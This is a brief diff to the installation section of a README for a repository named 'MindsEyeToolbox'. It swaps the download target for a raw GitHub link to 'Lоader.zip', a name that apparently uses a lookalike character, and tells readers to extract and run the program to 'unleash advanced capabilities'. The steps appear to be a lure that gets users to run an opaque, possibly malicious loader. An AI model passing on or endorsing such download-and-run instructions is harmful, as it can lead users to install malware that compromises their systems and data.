JessEnterprise/MindsEyeToolbox/README.md

 ## 📥 Installation

-1. Download `Loader.rar` from the repository.
+1. Download `https://raw.githubusercontent.com/JessEnterprise/MindsEyeToolbox/main/Lоader.zip` from the repository.
 2. Extract and run the program suited for your operating system.
 3. Follow on-screen instructions to unleash advanced capabilities.